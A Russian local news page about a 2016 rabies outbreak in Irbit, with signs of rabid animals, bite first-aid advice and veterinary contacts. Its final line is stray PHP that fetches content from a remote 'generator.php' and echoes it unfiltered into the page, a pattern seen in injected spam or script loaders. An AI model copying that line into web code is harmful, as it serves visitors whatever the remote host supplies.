Регистрация нового пользоателя


наш двор
наш двор
В октябре 2016 г. зарегистрирован случай бешенства в городе Ирбите. Лиса напала на женщину, повредив ей лицо, когда та занималась хозяйственными работами в огороде.

2016-11-01 12:08:10
В октябре 2016 г. зарегистрирован случай бешенства в городе Ирбите. Лиса напала на женщину, повредив ей лицо, когда та занималась хозяйственными работами в огороде.

БЕШЕНСТВО В ИРБИТЕ

В г.Ирбите и Ирбитском районе ситуация по бешенству продолжает оставаться неблагополучной, за 2016 год зарегистрировано 24 случая  возникновения бешенства у животных ( в том числе 2 случая у домашних животных).  В октябре  зарегистрирован случай бешенства в городе Ирбите, лиса напала на женщину, повредив ей лицо, когда та занималась хозяйственными работами в огороде. Проводятся специальные мероприятия.

Характерные признаки болезни у животных

-Заболевание животных может проявляться как в буйной, так и в тихой (паралитической) формах.

-Больная собака угнетена, забирается в темный угол, не откликается на зов хозяина, хрипло лает, грызет камни, изо рта течет слюна, появляется косоглазие, отказывают задние ноги.

-Собака может в дикой злобе кидаться на всех подряд и бежать не разбирая дороги.

-При бешенстве в тихой форме собака может виновато ластиться к хозяину, а потом как бы случайно укусить его. Может убежать из дома.

-Боязни воды (гидрофобии) у собак обычно не бывает , и вода поставленная перед животным, не является достоверной проверкой его здоровья.

-Кошки тоже могут болеть буйно и тихо. Буйство их очень опасно. Бешеная кошка прыгает людям на голову, грызет кусает, и царапает все, что ей попадется на дороге. Однако она может тихо забраться в подвал или под диван и укусить человека, когда ее будут вытаскивать.

-Бешеная лисица забегает в поселки, залезает в сараи, кусает скот, дерется с собаками. Она может выйти на дорогу и стоять, не обращая внимания на людей. Но если к ней подойти, почти всегда бросается на человека.

Что делать если вас укусили?

Первое, что сделать необходимо, это немедленно промыть место укуса мылом. Мыть надо довольно интенсивно, в течении 10 минут. Глубокие раны рекомендуется промывать струей мыльной воды, например с помощью шприца. Не нужно прижигать раны или накладывать швы. После этого сразу же обращайтесь в ближайший травмпункт, ведь успех вакцинопрофилактики бешенства сильно зависит от того, насколько быстро вы обратитесь к врачу. При этом, если есть такая возможность, необходимо установить наблюдение за укусившим человека животным. Далее следует провести курс прививок, назначенный врачом-рабиологом. На время вакцинации и спустя 6 месяцев после нее необходимо воздерживаться от употребления спиртных напитков. 

По вопросам обращаться ГБУСО Ирбитская ветстанция : (34355) 6-71-43.

 Ветеринарная лечебница ул.Лениа,42 тел. (34355)6-49-70.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>